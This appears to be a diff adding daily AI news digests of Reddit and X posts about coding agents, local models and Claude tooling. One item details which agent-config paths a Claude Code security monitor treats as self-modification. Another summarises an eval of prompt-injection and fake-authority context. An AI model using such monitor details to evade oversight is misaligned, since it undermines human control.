and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. 
The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer "what is this agent doing right now?" * The agents could run in parallel,… + +--- + +## [Steam Recommender using similarity! (Undergraduate Student Project) [P]](https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/) +*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> (DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad "action". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. 
What if I could capture unique tags that identify a game that aren't just "action" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game… + +--- + +## [Elgato Stream Deck Usage Plugin](https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!) + +--- + +## [Can we acknowledge that Anthropic watches open sourcers and copies them?](https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. 
My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n… + +--- + +## [Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]](https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/) +*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. 
But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express "miss to L1 vs miss to L3 vs full recompute," which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers… + +--- + +## [Claude MCP integration made my old meeting notes actually useful again](https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 +Tags: mcp, tool_update + +> I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet? + +--- + +## [Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:](https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 +Tags: api_update, cli_tool + +> The Karpathy coding skill is locked behind Pro. 
It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually ("can you add X", "why is this breaking", "clean this up"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like "implement", "build", "add", "fix", "change", or "improve" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage… + +--- + +## [What MCP servers are you guys using for persistent memory?](https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.96 +Tags: mcp, tool_update + +> Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded. 
+ +--- + +## [I realized character consistency breaks after the first few images](https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 0.90 +Tags: open_source, cli_tool + +> I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. 
It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever… + +--- + +## [My First Official AI Research Paper Accepted on SSRN](https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: product_launch + +> https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059) + +--- + +## [What solutions are you using to boost TPS and Context Window?](https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/) +*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 +Tags: api_update + +> **Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulkan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood.
The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work? + +--- + +## [How many years do you think we are from making feature films at home?](https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 +Tags: open_source + +> What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. 
Shari… + +--- + +## [Chroma1-HD Character Transfer with Flux.2 Dev](https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 +Tags: open_source + +> [Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\_flux\_character\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they… + +--- + +## [Vulkan or CPU llama cpp backend for local llm for coding/code assist](https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/) +*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 +Tags: developer_tool + +> Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). 
I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g… + +--- + diff --git a/data/digest-2026-05-13.md b/data/digest-2026-05-13.md new file mode 100644 index 0000000..e36aff8 --- /dev/null +++ b/data/digest-2026-05-13.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-13** | 15 stories | Auto-generated from 656 archived stories + +--- + +## [I'm cooked. Anthropic just split "--print" mode to $/mo credits](https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool, tool_update + +> So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \[tickets + agents + hooks + executors -> "claude -p" -> hands-free always-on productivity\]. 
Now that Anthropic has announced that "claude --print" will, from June 15 forward, be considered "programmatic" SDK usage, all jobs launched using "--print" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below! + +--- + +## [TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).](https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. 
All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat… + +--- + +## [Cross devices agent memory and context management?](https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, tool_update + +> Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type "codex" or "claude". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest "CHANGELOG" markdown file, or maybe even "HANDOFF.md" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/workflow? + +--- + +## [The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?](https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update + +> Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math.
**What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't "generate me a landing page." It's sustained autonomous development where the model maintains context across sessions, manages… + +--- + +## [Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)](https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: mcp, product_launch, agent_tool + +> * NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. 
* Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops "in your system prompt" from the "default to forking" reference so the rule applies generically to parent guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa… + +--- + +## [Context Is Not Control, a source-boundary eval for LLMs](https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. 
The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \* evidence \* user framing \* quoted material \* source text \* instruction-like contamination \* unsupported claims \* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that… + +--- + +## [What kinds of models are people training with document data? [P]](https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/) +*Reddit r/MachineLearning* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> We've helped some folks with synthetic data for a number of different projects and some of them for "document data". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? 
:-) + +--- + +## [A new monthly Agent SDK credit for Claude plans](https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr… + +--- + +## [Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms](https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: mcp, product_launch + +> Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. 
The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html) + +--- + +## [A fully autonomous browser runtime for any AI agents](https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. 
Please take a look and let me know: + +--- + +## [I built a native macOS app to manage Claude Code sessions, accounts, and projects](https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features! + +--- + +## [Fast mode for Claude Opus 4.7 is now available on the api.](https://x.com/DailyXplorer/status/2054464151234228372) +*X search / AI model updates* | 13/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Fast mode for Claude Opus 4.7 is now available on the api. + +--- + +## [Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. 
So I'm building Update Night, the searchable home for every AI t…](https://x.com/jiaweihq/status/2054463419722707134) +*X search / Agent workflows* | 13/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth + +--- + +## [Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling](https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of "AI did the work for me". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. 
If you've benchmarked Qwen3 tool-calling fail… + +--- + +## [I built a local GUI + AI builder for creating ComfyUI custom node packs](https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/) +*Reddit r/StableDiffusion* | 13/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next? + +--- + diff --git a/data/digest-2026-05-14.md b/data/digest-2026-05-14.md new file mode 100644 index 0000000..c62ad7a --- /dev/null +++ b/data/digest-2026-05-14.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-14** | 15 stories | Auto-generated from 592 archived stories + +--- + +## [The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.](https://x.com/OpenAIDevs/status/2051725072873001338) +*X / @openaidevs* | 05/05/2026 | Score: 1.00 +Tags: api_update, product_launch, open_source, developer_tool, tool_update + +> The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in. 
+ +--- + +## [Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)](https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: mcp, open_source, agent_tool + +> Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions! + +--- + +## [Simpler self hosted alt to Open WebUI](https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that "just works". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. 
